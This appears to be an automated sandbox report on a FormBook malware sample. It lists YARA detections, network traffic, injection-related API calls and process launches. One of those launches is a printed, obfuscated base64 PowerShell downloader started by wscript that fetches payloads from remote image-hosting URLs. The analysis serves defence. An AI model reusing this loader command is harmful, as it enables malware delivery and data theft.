Source: wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wscript.exe, 00000000.00000002.2098157278.00000213ED0D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094990618.00000213EF3C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2094688979.00000213EF3A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000000.00000003.2094688979.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2098682437.00000213EF302000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2090037082.00000213EF2FD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2095620106.00000213EEC85000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/about?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/domain_pricing?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/domains/results
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/email?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/privacy?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/renew/domain/rhyme.academy?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/renew?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/tools?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/tos?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.hover.com/transfer_in?source=expired
Source: SyncHost.exe, 0000000D.00000002.2684799089.0000000004FF4000.00000004.10000000.00040000.00000000.sdmp, SYYSBomrTxWSggG.exe, 00000011.00000002.3368885114.0000000003604000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000012.00000002.3366935102.0000000009064000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.instagram.com/hover_domains
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.61.152.60:443 -> 192.168.2.6:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49698 version: TLS 1.2

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.2683472741.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3371183272.0000000003150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2452322622.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.3370938043.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2468777900.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2683501602.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 10.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 10.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2683472741.0000000004270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3371183272.0000000003150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2452322622.0000000000EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.3370938043.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.2468777900.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.2683501602.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 2616, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5804, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 8874
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 8874 Jump to behavior
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c dir /b *.png *.jpg *.bmp *.gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c dir /b *.png *.jpg *.bmp *.gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt" Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_0042AF33 NtClose, 10_2_0042AF33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010335C0 NtCreateMutant,LdrInitializeThunk, 10_2_010335C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032B60 NtClose,LdrInitializeThunk, 10_2_01032B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032DF0 NtQuerySystemInformation,LdrInitializeThunk, 10_2_01032DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032C70 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_01032C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01033010 NtOpenDirectoryObject, 10_2_01033010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01033090 NtSetValueKey, 10_2_01033090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01034340 NtSetContextThread, 10_2_01034340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01034650 NtSuspendThread, 10_2_01034650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_010339B0 NtGetContextThread, 10_2_010339B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032B80 NtQueryInformationFile, 10_2_01032B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032BA0 NtEnumerateValueKey, 10_2_01032BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032BE0 NtQueryValueKey, 10_2_01032BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032BF0 NtAllocateVirtualMemory, 10_2_01032BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032AB0 NtWaitForSingleObject, 10_2_01032AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032AD0 NtReadFile, 10_2_01032AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032AF0 NtWriteFile, 10_2_01032AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032D00 NtSetInformationFile, 10_2_01032D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032D10 NtMapViewOfSection, 10_2_01032D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01033D10 NtOpenProcessToken, 10_2_01033D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032D30 NtUnmapViewOfSection, 10_2_01032D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01033D70 NtOpenThread, 10_2_01033D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032DB0 NtEnumerateKey, 10_2_01032DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032DD0 NtDelayExecution, 10_2_01032DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032C00 NtQueryInformationProcess, 10_2_01032C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032C60 NtCreateKey, 10_2_01032C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032CA0 NtQueryInformationToken, 10_2_01032CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032CC0 NtQueryVirtualMemory, 10_2_01032CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032CF0 NtOpenProcess, 10_2_01032CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032F30 NtCreateSection, 10_2_01032F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032F60 NtCreateProcessEx, 10_2_01032F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032F90 NtProtectVirtualMemory, 10_2_01032F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032FA0 NtQuerySection, 10_2_01032FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032FB0 NtResumeThread, 10_2_01032FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032FE0 NtCreateFile, 10_2_01032FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032E30 NtWriteVirtualMemory, 10_2_01032E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032E80 NtReadVirtualMemory, 10_2_01032E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032EA0 NtAdjustPrivilegesToken, 10_2_01032EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01032EE0 NtQueueApcThread, 10_2_01032EE0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046535C0 NtCreateMutant,LdrInitializeThunk, 13_2_046535C0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04654650 NtSuspendThread,LdrInitializeThunk, 13_2_04654650
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04654340 NtSetContextThread,LdrInitializeThunk, 13_2_04654340
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652C60 NtCreateKey,LdrInitializeThunk, 13_2_04652C60
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652C70 NtFreeVirtualMemory,LdrInitializeThunk, 13_2_04652C70
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652CA0 NtQueryInformationToken,LdrInitializeThunk, 13_2_04652CA0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652D30 NtUnmapViewOfSection,LdrInitializeThunk, 13_2_04652D30
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652D10 NtMapViewOfSection,LdrInitializeThunk, 13_2_04652D10
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652DF0 NtQuerySystemInformation,LdrInitializeThunk, 13_2_04652DF0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652DD0 NtDelayExecution,LdrInitializeThunk, 13_2_04652DD0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652EE0 NtQueueApcThread,LdrInitializeThunk, 13_2_04652EE0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652E80 NtReadVirtualMemory,LdrInitializeThunk, 13_2_04652E80
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652F30 NtCreateSection,LdrInitializeThunk, 13_2_04652F30
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652FE0 NtCreateFile,LdrInitializeThunk, 13_2_04652FE0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652FB0 NtResumeThread,LdrInitializeThunk, 13_2_04652FB0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_046539B0 NtGetContextThread,LdrInitializeThunk, 13_2_046539B0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652AF0 NtWriteFile,LdrInitializeThunk, 13_2_04652AF0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652AD0 NtReadFile,LdrInitializeThunk, 13_2_04652AD0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652B60 NtClose,LdrInitializeThunk, 13_2_04652B60
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652BE0 NtQueryValueKey,LdrInitializeThunk, 13_2_04652BE0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 13_2_04652BF0
Source: C:\Windows\SysWOW64\SyncHost.exe Code function: 13_2_04652BA0 NtEnumerateValueKey,LdrInitializeThunk, 13_2_04652BA0
